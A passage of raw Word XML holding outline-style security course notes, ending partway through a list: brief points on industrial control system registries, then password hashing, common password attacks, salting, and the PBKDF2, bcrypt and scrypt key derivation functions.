          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>how many are exposed, how many are used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED55256" w14:textId="4F027F86" w:rsidR="006064C0" w:rsidRDefault="006064C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>registry associations with specific processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE322D4" w14:textId="1E5D338C" w:rsidR="006064C0" w:rsidRDefault="006064C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>registry values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788F44EB" w14:textId="2E3F61C6" w:rsidR="006064C0" w:rsidRDefault="006064C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>processes and phases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA16A84" w14:textId="4706CCCE" w:rsidR="006064C0" w:rsidRDefault="006064C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sensor and actuator position, function, and count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEBD3EC" w14:textId="292AED7A" w:rsidR="00DB7319" w:rsidRDefault="00DB7319" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Changing registry processes to create havoc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE5390F" w14:textId="054C6A6A" w:rsidR="00DB7319" w:rsidRDefault="00DB7319" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>re-assigning registries can cause ordered processes to execute out of order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B247F" w14:textId="15EA79A7" w:rsidR="00DB7319" w:rsidRDefault="00DB7319" w:rsidP="00DB7319">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0123E7E2" w14:textId="014D27E7" w:rsidR="00DB7319" w:rsidRDefault="00523090" w:rsidP="006F0520">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Password Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08006791" w14:textId="4F71A465" w:rsidR="006F0520" w:rsidRDefault="00D10DC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC9B78" w14:textId="3402C1B8" w:rsidR="00D10DC9" w:rsidRDefault="00D10DC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>one of three forms of authentication (what you know)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE8F9A" w14:textId="10FAB26B" w:rsidR="00D10DC9" w:rsidRDefault="00D10DC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Password Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9B7F5F" w14:textId="2F5573C0" w:rsidR="00D10DC9" w:rsidRDefault="00D10DC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>one-way algorithm function that creates a fingerprint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4653DB" w14:textId="104CDD10" w:rsidR="00D10DC9" w:rsidRDefault="00D10DC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>one-way, reversing is complex and resource intensive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC9613D" w14:textId="1D370F24" w:rsidR="00D10DC9" w:rsidRDefault="00D10DC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Online and Offline Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644CA314" w14:textId="67ACFE47" w:rsidR="00D10DC9" w:rsidRDefault="00D10DC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Importance of Good Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A3DC35" w14:textId="1BA729F0" w:rsidR="00D10DC9" w:rsidRDefault="00D10DC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77008EFC" w14:textId="7BD33AE2" w:rsidR="00D10DC9" w:rsidRDefault="00D10DC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>password with key size of a certain length can calculate how long a brute-force attack will take</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7186FA44" w14:textId="05C83A82" w:rsidR="00174CD3" w:rsidRDefault="00174CD3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>not a confirmed indicator of security as hash cracking ability has grown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7938C2" w14:textId="30DD3C7D" w:rsidR="00A564AD" w:rsidRDefault="00A564AD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266533D" w14:textId="1040972C" w:rsidR="00A564AD" w:rsidRDefault="00A564AD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Guessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F42138" w14:textId="5C2DC2AA" w:rsidR="0039532C" w:rsidRDefault="0039532C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>human generated passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126EE9F1" w14:textId="6291E845" w:rsidR="00A564AD" w:rsidRDefault="00A564AD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Dictionary Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12888A38" w14:textId="2924EFFB" w:rsidR="0039532C" w:rsidRDefault="0039532C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234BA6C0" w14:textId="091741C9" w:rsidR="00A564AD" w:rsidRDefault="00A564AD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Rainbow Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C436813" w14:textId="68B9B0BE" w:rsidR="0039532C" w:rsidRDefault="0039532C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pre-computed dictionaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BE6AA6" w14:textId="08AB436F" w:rsidR="0039532C" w:rsidRDefault="0039532C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Brute-Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D46BAF6" w14:textId="1D00C26E" w:rsidR="0039532C" w:rsidRDefault="0039532C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Password Storage and Defense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412FBCB2" w14:textId="62B4984F" w:rsidR="0039532C" w:rsidRDefault="0039532C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Plaintext, Hashed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454407EF" w14:textId="543DF480" w:rsidR="0039532C" w:rsidRDefault="0039532C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2265"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Salting Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D9AC1D" w14:textId="4FE26684" w:rsidR="0039532C" w:rsidRDefault="0039532C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>When using the time-space trade-offs in attacks against password hashing, the overall complexity (storage + speed) of the attack is the same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83B4BD" w14:textId="0AA23CD7" w:rsidR="0039532C" w:rsidRDefault="0039532C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>longer salt values are better</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04ACCC" w14:textId="049F0695" w:rsidR="0039532C" w:rsidRDefault="0039532C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use specialized hashing algs to slow down brute-forcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC360D" w14:textId="2FAB3ED8" w:rsidR="0039532C" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Different Hashes Have Different Cracking Speeds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5796A26F" w14:textId="45255329" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Machines are able to find collisions for different algorithms at different rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F41ADE" w14:textId="4E2A73C8" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>this is limited through a key derivation function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA89E37" w14:textId="6C858380" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>generate longer secrets from a given secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5912BA3D" w14:textId="1F18A63B" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>accomplished through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FADE952" w14:textId="0FABD532" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>key separation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EA17A" w14:textId="59293593" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>multiple keys from a single master password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E1163" w14:textId="1CF92338" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>key stretching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC8D484" w14:textId="1A4A31B8" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>create longer password from a shorter one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079FBBA6" w14:textId="2B622142" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>key whitening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA2AA67" w14:textId="7C403B11" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>changes format of key to a desired format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4726E98C" w14:textId="23BA97B1" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PBKDF2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485A275C" w14:textId="1FC2DB3D" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pseudorandom Function + Password + Salt + iterations + desired length of derived key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116164FE" w14:textId="68E7EDF7" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A0FAC4" w14:textId="04E0124C" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>adjustable iterations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232A9480" w14:textId="21221D06" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C0256E" w14:textId="24357BE7" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>designed for speed not complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF1992" w14:textId="4006D3C0" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>not intensive memory wise for attackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F64E61" w14:textId="73EC9B8F" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>low protection against GPU/FPGA/ASIC crackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5718A0C1" w14:textId="00A20A5B" w:rsidR="00957441" w:rsidRDefault="00957441" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>bcrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6373F66F" w14:textId="6D713B19" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Time Cost + Salt + Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF531CF" w14:textId="3990A8F5" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>blowfish encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE953E" w14:textId="1E7FE99D" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C31F072" w14:textId="4C40A369" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cost factor to adapt changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C9D1C7" w14:textId="0D3FD6E6" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>expensive function based on Blowfish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6523DE2A" w14:textId="4840AC20" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7418335E" w14:textId="60249CDE" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>not intensive memory wise for attackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A2EBC1" w14:textId="2DA6AAF1" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>medium protection against GPU/FPGA/ASIC crackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8A635" w14:textId="1AEB997C" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>scrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6BE8C3" w14:textId="53A4195C" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Password + Salt + CPU/Memory Cost + parallelization parameter + intended output length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596DCCF1" w14:textId="0A0AE137" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6EA16B" w14:textId="2B37A2BD" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cost factor for time and memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106AED2D" w14:textId="1A7BCFAB" w:rsidR="00933F10" w:rsidRDefault="00933F10" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PBKDF2 building block</w:t>
      </w:r>
